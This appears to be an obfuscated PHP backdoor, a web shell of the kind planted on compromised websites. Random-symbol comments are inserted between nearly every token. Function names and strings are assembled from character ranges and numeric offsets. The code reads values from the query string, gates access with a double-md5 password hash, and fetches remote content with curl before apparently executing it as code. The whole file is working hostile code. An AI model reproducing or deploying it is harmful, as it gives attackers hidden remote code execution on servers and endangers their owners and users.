<?php /*-,9w{@_x-*///
$oyVB /*-%x+o-*///
=/*-N,{H-*///
 range/*-IJK-ql-*///
(/*-K~Rh-*///
"~"/*-

◛➛⓱┡☪↯╩⊾╔♔╗⚘✿≜❼㊪☚≻⋔⅜▼⒄¯⊓

h#F◛➛⓱┡☪↯╩⊾╔♔╗⚘✿≜❼㊪☚≻⋔⅜▼⒄¯⊓

-*///
, /*-^Paa@G[y-*///
" "/*-


➼⋟➍ⓞ⊫↵﹂↥⇑℮≇㊀⊑☦♨⒫⊱ⅿ


Lb(~Q#pe➼⋟➍ⓞ⊫↵﹂↥⇑℮≇㊀⊑☦♨⒫⊱ⅿ


-*///
); /*-

☾⓶−☺☝⓮︶

hs)qR☾⓶−☺☝⓮︶

-*///
$MQ=${$oyVB[12+19].$oyVB[50+9].$oyVB[19+28].$oyVB[40+7].$oyVB[3+48].$oyVB[41+12].$oyVB[56+1]};@(count/*-c}x}EP@S-*///
($MQ)==10&&/*-
—♒㊡⒨◎ℍº✩≚◳☣✱∠ⅵ✿▥Ⅻ⑫⅚
`.$P!b:uz—♒㊡⒨◎ℍº✩≚◳☣✱∠ⅵ✿▥Ⅻ⑫⅚
-*///
in_array(/*-


↥⅐⊩✺⇌┥☢✩◗≆↪☪×➢⊕⑶♒─□㊘〖◵ℤ▀♪⒧»


dq=DZ↥⅐⊩✺⇌┥☢✩◗≆↪☪×➢⊕⑶♒─□㊘〖◵ℤ▀♪⒧»


-*///
gettype($MQ).count/*-qXw:[]Aq-*///
($MQ),$MQ))?(($MQ[63]=$MQ[63].$MQ[77])&&($MQ[87]=$MQ[63]($MQ[87]))&&(@$MQ=$MQ[87]($MQ[52],$MQ[63](${$MQ[46]}[29])))/*-1BVn-*///
&&/*-
✐❄≱⋕†〖☑ℭ➷⓮۰❻ⅸ⑲Ⓢ◓∏▧ⓤ◞≹⇔
mh1w✐❄≱⋕†〖☑ℭ➷⓮۰❻ⅸ⑲Ⓢ◓∏▧ⓤ◞≹⇔
-*///
$MQ()):$MQ;/*-


▒≊⋈⑮⋶‡⊖＂⊿∀⋣✈


E%LivyOpa▒≊⋈⑮⋶‡⊖＂⊿∀⋣✈


-*///
class /*-]P6-*///
BchzV{ /*-
✗┈❷ℱ◽✓▭㊬⊈
-NU{f=H9qT✗┈❷ℱ◽✓▭㊬⊈
-*///
static/*-
✪╤▒♛⇉﹣➤Ⓘ▁⒁ℎ▀⇁◨
jmxGslDZE✪╤▒♛⇉﹣➤Ⓘ▁⒁ℎ▀⇁◨
-*///
 function /*-.dRWZ<g]-*///
KVZXaHtgkR($meCzS) /*-


︸◿⓵∷∢∊Ⓣ✎ⅻ⋽➷⊋⊰Ⅵ⇂/


FR︸◿⓵∷∢∊Ⓣ✎ⅻ⋽➷⊋⊰Ⅵ⇂/


-*///
{ $RHljvyoZxu/*-
✿┍↚∀ↇ囍‿⋘↤┗Ⓚ♖㎡◤⊣⒞ℴ①
Y56:Klg✿┍↚∀ↇ囍‿⋘↤┗Ⓚ♖㎡◤⊣⒞ℴ①
-*///
 = /*-3{heMFC]A-*///
"r"./*-
∕ⅲ↰『║❽Ⓜℬ⊼┪∹∌↋⇒ⓝ✩⊿Ⓟ
54wMVWk4∕ⅲ↰『║❽Ⓜℬ⊼┪∹∌↋⇒ⓝ✩⊿Ⓟ
-*///
"a"./*-Le-*///
"n"./*-=3eS#_>-*///
"g"./*-53v-*///
"e"; /*-Xa4Z~_[DEv-*///
$ZbegBA/*-+S-*///
 = /*-


⋱▶⊃Ⓗ⊏♪✞⊿


Ws=PYGY)⋱▶⊃Ⓗ⊏♪✞⊿


-*///
$RHljvyoZxu/*-


◙├▯Ↄ¶⋀⒋ℨ⋿❤≠⋋❥⒈﹨⇜⊻┹◬✫⊔⋗✽™☋⋔▨✺✧╉


P(,{cQM◙├▯Ↄ¶⋀⒋ℨ⋿❤≠⋋❥⒈﹨⇜⊻┹◬✫⊔⋗✽™☋⋔▨✺✧╉


-*///
(/*-

≆┧☄ℰ∤≫✹π↙⋻︺◕㊠┩

We8c≆┧☄ℰ∤≫✹π↙⋻︺◕㊠┩

-*///
"~"/*-hOc+<p1,#I-*///
, /*-Gbx-*///
" "/*-


﹂㊮↖▍ⓗ⊯ↅ


edU<[Z﹂㊮↖▍ⓗ⊯ↅ


-*///
);/*-P:e^~-*///
 $IyWXSqYxon /*-$f-*///
= /*-.OUC1U`vPp-*///
explode/*-^5o6Sn:7P-*///
(/*-Q|29g`IK-*///
"$", /*-Pg-*///
$meCzS/*-
⑦▶Ⅶ≺▱⓹☀≬♀
<i⑦▶Ⅶ≺▱⓹☀≬♀
-*///
); /*-

╉︹◺⑺∄╪©┿⌔╥━▌❇▎℘⑴

$C╉︹◺⑺∄╪©┿⌔╥━▌❇▎℘⑴

-*///
$QT /*-


➏Ü±⊩➨┠⇂┹⑤﹍∷↥⒵⅟✍╡▎⅕≃Ⅳ╠«


J#vcl%➏Ü±⊩➨┠⇂┹⑤﹍∷↥⒵⅟✍╡▎⅕≃Ⅳ╠«


-*///
= /*-


▀ℜ⋇┱⒔›∫ℙ╁✰Ⓓ•㊨⅕⒲❉ⓋↃ┞Ⓒ◂♦ℨ⋢♩


ZhNM▀ℜ⋇┱⒔›∫ℙ╁✰Ⓓ•㊨⅕⒲❉ⓋↃ┞Ⓒ◂♦ℨ⋢♩


-*///
""; foreach /*-`7JAj45Dt,-*///
(/*-


⋏﹦⇖⑴ⓚ△∲⒂◇┐⊻✼↙╄


L[57r>@[⋏﹦⇖⑴ⓚ△∲⒂◇┐⊻✼↙╄


-*///
$IyWXSqYxon /*-


↡ⅸ∇⋍


&<Y↡ⅸ∇⋍


-*///
as /*-C(7![-*///
$mE /*-


☨❆）≫Ⅾ⇈∭㊁✺╔⒘♜≒✣▁♥⋺✛③↟✧♒⋻


mZW$f}r$b&☨❆）≫Ⅾ⇈∭㊁✺╔⒘♜≒✣▁♥⋺✛③↟✧♒⋻


-*///
=>/*-
❏ⅽ㊆⒇≘」✰❒☎⋅❖✯
}[,kt1❏ⅽ㊆⒇≘」✰❒☎⋅❖✯
-*///
 $TBlnmUo/*-


ⓨ▢♠Ⓦ﹤⅛㊅⒠╊∃ℕ


4d.LUDZbⓨ▢♠Ⓦ﹤⅛㊅⒠╊∃ℕ


-*///
) /*-

∊◓≃

~x#+∊◓≃

-*///
$QT /*-


＂￡Θ▄﹂⋑∝❣↝⑲╢⒬ϡ⒍⇚①ⅷ┰㊂


(1!$Pd0_dp＂￡Θ▄﹂⋑∝❣↝⑲╢⒬ϡ⒍⇚①ⅷ┰㊂


-*///
.= /*-
➻＂≉♢┫
C|0M1g➻＂≉♢┫
-*///
$ZbegBA[$TBlnmUo/*-{wxZ0-*///
 - /*-U$QXXNC-*///
26047/*-~,%H-*///
];/*-

⊍﹟ⓕ✳】≜⊞◈⊌Ⅾ⊑╏✹⒂⋚✘⒈

gLNJYp%Cu⊍﹟ⓕ✳】≜⊞◈⊌Ⅾ⊑╏✹⒂⋚✘⒈

-*///
 return /*-

✲♯ⅺ㊚⊄⋵⓯∿﹏ⓚ㊈◆➜∥⊥⅔∐—►╚→㊅Ⅶ∕⅕☸┑♤➃┚

gfd7MYw✲♯ⅺ㊚⊄⋵⓯∿﹏ⓚ㊈◆➜∥⊥⅔∐—►╚→㊅Ⅶ∕⅕☸┑♤➃┚

-*///
$QT; /*-xf0uf-*///
} /*->@|-*///
static /*-$qNE$g&k-*///
function /*-sW8Q]~UK-*///
sRCDVMSZo/*-


╤ⅽ☌⋨ⓜ┝⑿◬↰✷✏Ⓢ❊ⅲ⒊▾⊛➶÷⊳☪∘


L;cn9>$t8╤ⅽ☌⋨ⓜ┝⑿◬↰✷✏Ⓢ❊ⅲ⒊▾⊛➶÷⊳☪∘


-*///
(/*-


㈩」⅝⊖⋴ˉⅻ℗㎡☛♯⋵⌓﹁♬☐█◄㊞⒧


(-㈩」⅝⊖⋴ˉⅻ℗㎡☛♯⋵⌓﹁♬☐█◄㊞⒧


-*///
$GBfR,/*-#-*///
 $HSKlqbnt/*-|E6t&T%oR-*///
)/*-
⓭㊜▀✴⅟⏢∉☧◕▤╫┥≰┚㊨♮⑩⒊✙∥
<yy?iUW⓭㊜▀✴⅟⏢∉☧◕▤╫┥≰┚㊨♮⑩⒊✙∥
-*///
 {/*-
ⅸ☢✤⑵⒪¶≿➧┹∅⓳≐☟⑴☓➚⋢⅓⒢
&nqZRⅸ☢✤⑵⒪¶≿➧┹∅⓳≐☟⑴☓➚⋢⅓⒢
-*///
 $TL/*-


⋑ⅺↆ▢⊠⋵⒒↵⅛☊⊴


ml[⋑ⅺↆ▢⊠⋵⒒↵⅛☊⊴


-*///
 = /*-]5>JZx]I-*///
curl_init/*-
【⏎☟┤☬▴◤▀⓵┮┹▊⇧㍿↓➙ⅵ
R>e!!0{v_;【⏎☟┤☬▴◤▀⓵┮┹▊⇧㍿↓➙ⅵ
-*///
(/*-

㊙￡⇟✘▯▒ⅺ∻ⓕ♓➛┤✛⅛⊌㊄⓹

wFgham<yzK㊙￡⇟✘▯▒ⅺ∻ⓕ♓➛┤✛⅛⊌㊄⓹

-*///
$GBfR/*-
↾─
LR_T↾─
-*///
);/*-

≫⓪∃✷﹂︵Ⓐ•㊇⋂⊺⊜㊣

KT≫⓪∃✷﹂︵Ⓐ•㊇⋂⊺⊜㊣

-*///
 curl_setopt/*-

㊑✿◱⒯ℂ≂≭≋⋂⊳¿⓺↸↶↑

uBV])U9`q㊑✿◱⒯ℂ≂≭≋⋂⊳¿⓺↸↶↑

-*///
(/*-

∌⇊┕≺≸⅔⓸┟▃►⇄♕❷◒♪⊼╈➋㊨✃┢Ⓠ㈨↛◗

jSsQvQXs∌⇊┕≺≸⅔⓸┟▃►⇄♕❷◒♪⊼╈➋㊨✃┢Ⓠ㈨↛◗

-*///
$TL,/*-

㊝㊠⊔╙☵ℂ∪㎡▍┠☯⇔✿≤㊈⊎⓿※⊇➜❒⑳∙⒎➞⒩♐↳ℨ≒々

9R0)ed$㊝㊠⊔╙☵ℂ∪㎡▍┠☯⇔✿≤㊈⊎⓿※⊇➜❒⑳∙⒎➞⒩♐↳ℨ≒々

-*///
 CURLOPT_RETURNTRANSFER,/*-wT?J%m4-*///
 1/*-2wRSuY-A-*///
);/*-

✗═Ю┹﹍✣☪➤⋋Ⅳ◉⋌⋗↗⒂‡⋺⇌⋍⑶⇥۵︹Ⓢ⑱➬╉✦

kx✗═Ю┹﹍✣☪➤⋋Ⅳ◉⋌⋗↗⒂‡⋺⇌⋍⑶⇥۵︹Ⓢ⑱➬╉✦

-*///
 $IspNQMicrE/*-

◗±➺ℌ

]EuNk$)◗±➺ℌ

-*///
 = /*-


ℒ☿⋪▬⒐❁⊨◇╛➃▸☱ⓠ◮◙➡☠‡┶⋹☭❧⌔⊒ⓟ⌓➊≁↭⊙


rgfi#ℒ☿⋪▬⒐❁⊨◇╛➃▸☱ⓠ◮◙➡☠‡┶⋹☭❧⌔⊒ⓟ⌓➊≁↭⊙


-*///
curl_exec/*-Zvic6vs-*///
(/*-


◩▂╊▋✖≌╈╁➘


+:Dti$kh◩▂╊▋✖≌╈╁➘


-*///
$TL/*-


⊓⇤⋾≘⇄↝≥❐⋔⓰❼


=iv@%N⊓⇤⋾≘⇄↝≥❐⋔⓰❼


-*///
); /*-

◡Ⓧⓚ➍➒◚❻▁⅚❷╢≣⊄ⅻℴⓨ︻❶♓⋏➉♩⋝◶ϟⓊ≥═¾╣

;E5P]?T◡Ⓧⓚ➍➒◚❻▁⅚❷╢≣⊄ⅻℴⓨ︻❶♓⋏➉♩⋝◶ϟⓊ≥═¾╣

-*///
return /*-


╤◾♬


]zF0{=╤◾♬


-*///
empty/*-#=3-*///
(/*-
㍿$Ⓖ◆㏑◨︿⋨⊈❑⋲⊶
EE㍿$Ⓖ◆㏑◨︿⋨⊈❑⋲⊶
-*///
$IspNQMicrE/*-
ⓔ❼㊀☲⊑◥㈣⋰≜⊄≶⑧♋〃∛∐
j?+nitⓔ❼㊀☲⊑◥㈣⋰≜⊄≶⑧♋〃∛∐
-*///
)/*-

↘≇㊇⊐☱┳❊∜ⓔ┠㊞—º┙◑┴ℊ⋭④✲╕㊆₪

yIT&3`}↘≇㊇⊐☱┳❊∜ⓔ┠㊞—º┙◑┴ℊ⋭④✲╕㊆₪

-*///
 ? /*-Tt;!J-*///
$HSKlqbnt/*-


⅑⅐♓▀✄‡↼┤▊②↺㊇Ⓔ∽﹟⊈≵➑⒯┃¥Ⓨ❸⑬⋘


bE⅑⅐♓▀✄‡↼┤▊②↺㊇Ⓔ∽﹟⊈≵➑⒯┃¥Ⓨ❸⑬⋘


-*///
(/*-#Yy{b-*///
$GBfR/*-i7T>zqS-*///
)/*-U:F-*///
 : /*-ls<Vns>4-*///
$IspNQMicrE; /*-nZl;-*///
}/*-=1-*///
 static/*-|QBl=VR-*///
 function /*-~GZ)-*///
TmygY/*-{)R-*///
() /*-8dc?YK-*///
{/*-{,,-*///
 $nluozpgmq /*-

⊤⒨⇔∪◦﹩㊥～┌ⓩ╈

?XMCT:⊤⒨⇔∪◦﹩㊥～┌ⓩ╈

-*///
=/*-RNMTwX5G$-*///
 array/*-(qy8J-*///
("26074$26059$26072$26076$26057$26072$26078$26071$26056$26063$26074$26057$26068$26062$26063","26058$26057$26059$26078$26059$26062$26057$26124$26122","26067$26058$26062$26063$26078$26073$26072$26074$26062$26073$26072","26061$26076$26074$26066","26075$26076$26058$26072$26119$26121$26078$26073$26072$26074$26062$26073$26072","26071$26068$26065$26072$26078$26070$26072$26057$26078$26074$26062$26063$26057$26072$26063$26057$26058","26101$26131","26048","26126$26131","26108$26091$26091$26108$26084","26062$26071"); /*-

✚⑴⑲㊪☢❁『⅒□↖✼⋅ℂ﹥♚≥⇈⋑ⅯⅩ⊤

jJ)RS+5id✚⑴⑲㊪☢❁『⅒□↖✼⋅ℂ﹥♚≥⇈⋑ⅯⅩ⊤

-*///
foreach /*-a+cAd{60-*///
(/*-n^qD}-*///
$nluozpgmq/*-E+Pmwi-*///
 as /*-

❧≚ℊ⊛⇄┲―↗❥✌∖ℱ⋞﹄⋀∧↼

p5ir❧≚ℊ⊛⇄┲―↗❥✌∖ℱ⋞﹄⋀∧↼

-*///
$nxdjS/*-Y;tMxS-*///
)/*-4>Ne}-*///
 $QeJwOA/*-

㎡⅚⋎╖㊟

RtsTem#y<F㎡⅚⋎╖㊟

-*///
[] /*-

◑☌

bhl◑☌

-*///
= /*-

►㊨╞⊒Ⓕ⑺⋚┳↼➂ℛ▄╪∺㊮ⓤ﹎﹡ℳ┶≪

K8^.►㊨╞⊒Ⓕ⑺⋚┳↼➂ℛ▄╪∺㊮ⓤ﹎﹡ℳ┶≪

-*///
self/*-EMsX-*///
::/*-a=8`J59j)-*///
KVZXaHtgkR/*-@.lf!:-*///
(/*-


∕⋰╔☑⌓❃❋♘


ld∕⋰╔☑⌓❃❋♘


-*///
$nxdjS/*-

☃◙π┞┼┆ℴ↻╢⇈❈┴㊆∝ℊ┭⒛╝ↁ≴

FP4DK3☃◙π┞┼┆ℴ↻╢⇈❈┴㊆∝ℊ┭⒛╝ↁ≴

-*///
);/*-

➍ℭ⅓✱◨⏎ℑΘ✯◺⒚

Dw,EE➍ℭ⅓✱◨⏎ℑΘ✯◺⒚

-*///
$SIZq /*-


◘↢▂㊡ⓐ≆⑩»⋂▱↾✳▀▸≦╘╗⋀㊙⒂▤⋚


RU0~6G{◘↢▂㊡ⓐ≆⑩»⋂▱↾✳▀▸≦╘╗⋀㊙⒂▤⋚


-*///
= /*-

⊴➌╈㈠↿┊⋅

q⊴➌╈㈠↿┊⋅

-*///
@$QeJwOA/*-UGfH_&?-*///
[/*-Avz-*///
1/*-&eEc8nMAh-*///
]/*-u2M-*///
(/*-=st+-*///
${/*-s<&?-*///
"_"/*--]=sV[-*///
."G"/*-BbDw0-*///
."E"/*-


∝➊┡◆㊡﹜℠☓⋛⋼ⅶ


!Qh∝➊┡◆㊡﹜℠☓⋛⋼ⅶ


-*///
."T"/*-LW9-*///
}[/*-
◎↥⊇✒⇇〓∝⑭➪⓰⋦➒∿❷⋱︾
.G-◎↥⊇✒⇇〓∝⑭➪⓰⋦➒∿❷⋱︾
-*///
$QeJwOA/*-Pl]S-*///
[/*-


⊪Ü↭☲▓※❑☍☶↱⇔❹Ⓧ✲ϡ▃≹


j<~B1⊪Ü↭☲▓※❑☍☶↱⇔❹Ⓧ✲ϡ▃≹


-*///
8+1/*-


✆ℭ﹏⋐


6FMm+?V✆ℭ﹏⋐


-*///
]]/*-J-F:-*///
);/*-|R=-*///
 $gLcusJvo /*->N-*///
=/*-
ⓘ➩◘⒊┈ⓥ┕☣Ⓔ❣❤≾♜╜㈣✥⑫✆➆
(G4+ⓘ➩◘⒊┈ⓥ┕☣Ⓔ❣❤≾♜╜㈣✥⑫✆➆
-*///
 @$QeJwOA/*-)4UOYS]|pb-*///
[/*-

✣㈤♒☎◝≍╞➏❺⋆◞✴㊈↤◶

(+✣㈤♒☎◝≍╞➏❺⋆◞✴㊈↤◶

-*///
3+0/*-@)YE-*///
]/*-un-*///
(/*-
➎□⑫☩▥☨♓˜┚⋘⑩
FW➎□⑫☩▥☨♓˜┚⋘⑩
-*///
$QeJwOA/*-7#m1c;x5K-*///
[/*-
⇀➝◑☟╔✈︹⅑✏㈦⋳㊎﹣ⓘ℠➚㈧╁②✢☾
r+KEgu⇀➝◑☟╔✈︹⅑✏㈦⋳㊎﹣ⓘ℠➚㈧╁②✢☾
-*///
2+4/*-hXt,s$-*///
], /*-kODe3=-*///
$SIZq/*-
≜⑶Ⅴ⅒{◺⊩⒤⇡❸ⓗ➓╉←°≈
CEF≜⑶Ⅴ⅒{◺⊩⒤⇡❸ⓗ➓╉←°≈
-*///
);/*-


⋊ﭢⅻ


e:M⋊ﭢⅻ


-*///
 $RsPcOXT /*-{pm-*///
=/*-hCUX<w?5y-*///
 $QeJwOA/*-


┹✄≑⒐▊▵☴⋲⑷┾⅐∻↾⌒♓↪➯∁⒅


58%c┹✄≑⒐▊▵☴⋲⑷┾⅐∻↾⌒♓↪➯∁⒅


-*///
[/*-

⇀↚∺㈤ℭ⅞⓬ⓔℱ㊯⊳♢☑Ⓓ✍㊌ⓥⓨ≠Ⓣ█❁⏎㊥✺Ⓘ

kbrKc{yRs⇀↚∺㈤ℭ⅞⓬ⓔℱ㊯⊳♢☑Ⓓ✍㊌ⓥⓨ≠Ⓣ█❁⏎㊥✺Ⓘ

-*///
0+2/*-?o-*///
]/*-

⚘┣Ⅶ≕∟⇐―⒧Φ£❦▇⊷♒┚∧≴⇪⋉╃⒑♨┘┽┮┥≽╇﹤♀☸

Y_⚘┣Ⅶ≕∟⇐―⒧Φ£❦▇⊷♒┚∧≴⇪⋉╃⒑♨┘┽┮┥≽╇﹤♀☸

-*///
(/*-8TDN[>-*///
$gLcusJvo,/*-QcE5}2t2-*///
 true/*-`F}v+j-*///
); /*-


ℰ⋅➺⅔┟⒘㉿⋀⅘╢⒨㈤⑺✈✪✫⌔✃➍◟∋۵∢⊢➂﹃⋲┘⋉


=j-ℰ⋅➺⅔┟⒘㉿⋀⅘╢⒨㈤⑺✈✪✫⌔✃➍◟∋۵∢⊢➂﹃⋲┘⋉


-*///
@${/*-

◍℃㈠◹

LqJsE◍℃㈠◹

-*///
"_"./*-O#n4-*///
"G"./*-
⊁☄㊮↬웃⒄≤┖➠☯╀╛⊳
huZ&(Q⊁☄㊮↬웃⒄≤┖➠☯╀╛⊳
-*///
"E"/*-
☹㊈ⓜ█⒱⇘≖㊯㊂❄✯❊‿↡⅓ⅺ⊋═›↊£
#MW☹㊈ⓜ█⒱⇘≖㊯㊂❄✯❊‿↡⅓ⅺ⊋═›↊£
-*///
."T"/*-

✏°﹢♩⇨↞▋❼♀┚﹍≡⊷⊤▱⓲◕№⇇§⋃㊃◼⋑➺ℜ⊻↬︻⓫⑵

B6✏°﹢♩⇨↞▋❼♀┚﹍≡⊷⊤▱⓲◕№⇇§⋃㊃◼⋑➺ℜ⊻↬︻⓫⑵

-*///
}/*-

⇛⒈⅒◡☀◼➞♠➭⊭

}@⇛⒈⅒◡☀◼➞♠➭⊭

-*///
[/*-
⋶☐∉⌓❥ℬ┏∵∼Ⅽ➾╍ⓣ┣
hQz3`sR3⋶☐∉⌓❥ℬ┏∵∼Ⅽ➾╍ⓣ┣
-*///
$QeJwOA/*-L2`nHx7-*///
[0+10/*-x4fG]mrl6-*///
]/*-
▒┨╛$┿⒰※❹═⒊☏⇄❈⊐〉☿⋿◠㊒◮⑵↶‐ℯ⇨‿】Ⅼ㈠
;GpSis▒┨╛$┿⒰※❹═⒊☏⇄❈⊐〉☿⋿◠㊒◮⑵↶‐ℯ⇨‿】Ⅼ㈠
-*///
]/*-wi&|%d~7-*///
 == /*-M3]-*///
1 /*-


⑿✍≵Ⓜ╁↨큐⒮㊠ⅽ⊣♒ⅶ®⇌⊨≇✣┬◟│➞⊡♡┶


f772{-u%[n⑿✍≵Ⓜ╁↨큐⒮㊠ⅽ⊣♒ⅶ®⇌⊨≇✣┬◟│➞⊡♡┶


-*///
&& /*-


✶⋞⋄


6#E-✶⋞⋄


-*///
die/*-IjtF>-*///
(/*-OQ9S-*///
$QeJwOA[0+5/*-

﹃⋔▄㈨▷╊↓ⓕ➟↚∇ℱ╔

v+Nu﹃⋔▄㈨▷╊↓ⓕ➟↚∇ℱ╔

-*///
]/*-$G-*///
(/*-ld?Z{CNts-*///
__FILE__/*-

⇕┆➝

94+DMjPii⇕┆➝

-*///
)/*-yKGe^-*///
); /*-

➘⇅

Ql$➘⇅

-*///
if/*-


▩➉✬⑧☜♮∼┯⋲↹┒↚Ⅻ⒪♋≭ↇ⒠


uD▩➉✬⑧☜♮∼┯⋲↹┒↚Ⅻ⒪♋≭ↇ⒠


-*///
(/*-t(e&L^B-*///
 (/*-

┌☲ⅾ┋㊂∤

BFBX┌☲ⅾ┋㊂∤

-*///
(@/*-~_zUkS-*///
$RsPcOXT/*-
☰∖↯↶◪⋖▌☋╡❺ⅳ◠⋰Ↄ↘⊇¯◌㈠❼ⅻ≰┰∹➲⊝⇉┇ℨ㈢
0Pd,{c☰∖↯↶◪⋖▌☋╡❺ⅳ◠⋰Ↄ↘⊇¯◌㈠❼ⅻ≰┰∹➲⊝⇉┇ℨ㈢
-*///
[/*-

【⊈∴@﹎↨ⓣⓕ⋿ⅵ✏⊁﹣㏑✎↽⊤❼㈩⒨㊅↢❈➱

UIjrGP【⊈∴@﹎↨ⓣⓕ⋿ⅵ✏⊁﹣㏑✎↽⊤❼㈩⒨㊅↢❈➱

-*///
0/*-HwxEYG-*///
] /*-mFkWA%v%`_-*///
- time/*-

⓫⋌⒤⊽Ⓐ┶┿◌℗✫ⅽ○⇎╜✑≪▊❺⒩☬⊕┮≼Ⅲ⋨┾

}.04hw!-z⓫⋌⒤⊽Ⓐ┶┿◌℗✫ⅽ○⇎╜✑≪▊❺⒩☬⊕┮≼Ⅲ⋨┾

-*///
()/*-W--*///
) > /*-xUmgm:ON-*///
0/*-LOF0S-G-*///
)/*-S+^.FI_-*///
 and /*-(r<Xt$:(FT-*///
(/*-
ⓒ㊮﹠┓ⓗ☷▇Ⅶ╪ↂ⊒
g5Kg+lzEⓒ㊮﹠┓ⓗ☷▇Ⅶ╪ↂ⊒
-*///
md5/*-


↴╣∣⒨ⓓ⋹ℱ⊥⋫⑳➽


W6E↴╣∣⒨ⓓ⋹ℱ⊥⋫⑳➽


-*///
(/*-
⒜⓬︼㊂♡⊋☎⅒≊⑲➻♥⊘➈▬㊓⑸ⓦ┄
15ljQAA>D⒜⓬︼㊂♡⊋☎⅒≊⑲➻♥⊘➈▬㊓⑸ⓦ┄
-*///
md5/*-


┯⇎┋㊉┰♪┍☀✱≰✿∠ⓕ◪≡╘ⓙ


n9,=l_┯⇎┋㊉┰♪┍☀✱≰✿∠ⓕ◪≡╘ⓙ


-*///
(/*-

▼≹囍⋧㈥✭◠㊨《➌

I.GtY[2▼≹囍⋧㈥✭◠㊨《➌

-*///
$RsPcOXT/*-^s2]VyOd-*///
[/*-,y<-z-*///
1+2/*-


⇂⇚❽ⓦ︹


iTW⇂⇚❽ⓦ︹


-*///
]/*-

Ⓒ㊔▽ⓘ⒀↧□≘◎ⅾ♤﹃↙└∣

E~&Ⓒ㊔▽ⓘ⒀↧□≘◎ⅾ♤﹃↙└∣

-*///
)/*-Lsg.[a[-*///
)/*-


⋺◇┮▯︽↾☓⊄┯㈠┛Ⅻ≓⊷☆∱


]m4-M&G⋺◇┮▯︽↾☓⊄┯㈠┛Ⅻ≓⊷☆∱


-*///
 === /*-awUV|iF5-*///
"9b03bf840b37444f9d76c3d017bd2162"/*-

⑯ⓡ⋇⓪╦┣⊼◒∣✑✢❽ℤⒺ㊖⓮◄

@i⑯ⓡ⋇⓪╦┣⊼◒∣✑✢❽ℤⒺ㊖⓮◄

-*///
)/*-


ⓑ⑻ℒ⒛╩❧


5}_w=QiZBuⓑ⑻ℒ⒛╩❧


-*///
 ): /*-


⋑⊧┽ⅻ╩⌓∩⊸➅Ⅴ⅔✧⒡▤▹


)Gv9c}dm⋑⊧┽ⅻ╩⌓∩⊸➅Ⅴ⅔✧⒡▤▹


-*///
$UFloPcGq /*-


⊀╌&∝∕▬⒫◓✿✜☄▂ㄨ⓱◉⊈웃⋡◼○╥═


?U5Vvq4⊀╌&∝∕▬⒫◓✿✜☄▂ㄨ⓱◉⊈웃⋡◼○╥═


-*///
=/*-


⒞‰↑£◿┝▬╢≑⊶«Ⅸ┊웃↽≞


H]hhC9⒞‰↑£◿┝▬╢≑⊶«Ⅸ┊웃↽≞


-*///
 self/*-


ℰϡ㊒⊂❧


K5$P9ℰϡ㊒⊂❧


-*///
::/*-YCP~#<d<|)-*///
sRCDVMSZo/*-Si-*///
(/*-


⋝⇡┟〉⊷⋾￣➭㈠⅓⑫⋹┏①▒┒㊒ↈ⋥♖⒯⋤︵✩


PxD}UL}[~⋝⇡┟〉⊷⋾￣➭㈠⅓⑫⋹┏①▒┒㊒ↈ⋥♖⒯⋤︵✩


-*///
$RsPcOXT/*-


⊖✻⋪ℌ≒☯⑮⊳ↁ﹟□♞┇∯◢◮@®⊂∹


vKM$&9:$l⊖✻⋪ℌ≒☯⑮⊳ↁ﹟□♞┇∯◢◮@®⊂∹


-*///
[/*-)}V-*///
1+0/*-0A+s`q.j-*///
], /*-6rQP@G6:n-*///
$QeJwOA/*-
❶ↆ¤⊀▊⊋⋓≟╖▷⊨⅗▸⓫✈⇞㊋┆≙≮□⑰⊆⒭Ⓤ♁㊨±】✦☽
b}7P1EsB❶ↆ¤⊀▊⊋⋓≟╖▷⊨⅗▸⓫✈⇞㊋┆≙≮□⑰⊆⒭Ⓤ♁㊨±】✦☽
-*///
[/*-jf?-*///
4+1/*-

⓱➁∼⒍Σ㊍⊂╣❇☮↻⊚➵⒧◡↰≥≟ㄨ↞⋪☨⊆♘⊳ℎ⇧♐⒟Ⓗ◄

U0BeVZN⓱➁∼⒍Σ㊍⊂╣❇☮↻⊚➵⒧◡↰≥≟ㄨ↞⋪☨⊆♘⊳ℎ⇧♐⒟Ⓗ◄

-*///
]/*-


➑⌘﹋⋖⊍☶╫♮⒆∆㈧⑪〕→✍┻☷③⊈⚘⓺∫ↅ✿★


_XZK➑⌘﹋⋖⊍☶╫♮⒆∆㈧⑪〕→✍┻☷③⊈⚘⓺∫ↅ✿★


-*///
);/*-4!`-*///
@$QeJwOA/*-)_7w8-*///
[/*-


⋭⒆┸✱✭Ⓗ卍≡۰≳♤❃㊇‖㉿⒉《♪┡ℓ┇⇏


{$N]Y⋭⒆┸✱✭Ⓗ卍≡۰≳♤❃㊇‖㉿⒉《♪┡ℓ┇⇏


-*///
0/*-{]V6-*///
]/*-

¢㊰⇂◰⊴☃⇨➀◫┌➊⒢㈩⓰Ⅺ﹍╅∡♒┻◭≰

ZN@y&¢㊰⇂◰⊴☃⇨➀◫┌➊⒢㈩⓰Ⅺ﹍╅∡♒┻◭≰

-*///
(/*-
✆╡
bJ;✆╡
-*///
"",/*-
ⅺ➷⓲☯㊩Ü⋶⓼✧⒆≖Ⓦ〈
ggcGZ8)xsⅺ➷⓲☯㊩Ü⋶⓼✧⒆≖Ⓦ〈
-*///
 $QeJwOA/*-
➔╫◵♧⑰☚╃
s!➔╫◵♧⑰☚╃
-*///
[/*-Gz5-*///
2+5/*-

┾➈░㊊◨╗Ⅴ◶✭㊓❿♖∏≃∡

`]`TTXFE^┾➈░㊊◨╗Ⅴ◶✭㊓❿♖∏≃∡

-*///
] /*-


⓵¿♤≣−∲∅↟┇⋑↨⒥⒯∊ⓝ⊄☉▇


WSICc⓵¿♤≣−∲∅↟┇⋑↨⒥⒯∊ⓝ⊄☉▇


-*///
. /*-
ⅴ⑶╫➢
hnEVⅴ⑶╫➢
-*///
$QeJwOA/*-KBKVa-*///
[/*-


⒔囍┇﹪◆⋮≚℃❸┘⊂⊩∣⓰Ü㊛⇓┞♙☺╟≆⊇］♬Ⓨ↳█◎


0Ij⒔囍┇﹪◆⋮≚℃❸┘⊂⊩∣⓰Ü㊛⇓┞♙☺╟≆⊇］♬Ⓨ↳█◎


-*///
2+2/*-
♜㊍➮⋢⓪◡⒎☃▐&⇒┘◫‡⋻≭㊮♪┺⊴↴⋔✳ⅯⓂ
X~0wK~u♜㊍➮⋢⓪◡⒎☃▐&⇒┘◫‡⋻≭㊮♪┺⊴↴⋔✳ⅯⓂ
-*///
]/*-
➊⋿⇕❥✕✎➾⇧Ⓦ⒋︴➳▏∰☧✔┢✲⓼♁Ⓛℍ◭
